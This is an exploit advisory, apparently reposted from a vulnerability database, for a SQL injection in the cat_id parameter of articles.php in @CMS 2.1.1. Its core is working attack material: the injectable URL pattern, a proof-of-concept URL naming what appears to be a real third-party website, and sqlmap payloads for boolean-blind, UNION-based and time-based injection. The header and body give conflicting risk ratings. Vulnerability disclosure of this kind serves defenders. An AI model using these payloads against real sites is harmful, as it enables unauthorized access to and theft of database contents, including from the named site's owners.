CMS 2.1.1 SQL Injection

2014-08-26 / 2017-08-16
Credit: Renzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# SQL Injection on @CMS 2.1.1 Stable # Risk: High # CWE number: CWE-89 # Date: 22/08/2014 # Vendor: www.atcode.net # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on: Linux Mint # Vulnerable File: articles.php # Exploit: http://host/articles.php?cat_id=[SQLI] # PoC: http://carla-coluXmna.de/articles.php?cat_id=[SQLI] --- "SQLi using sqlmap."--- Place: GET Parameter: cat_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs --- # Thank's


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top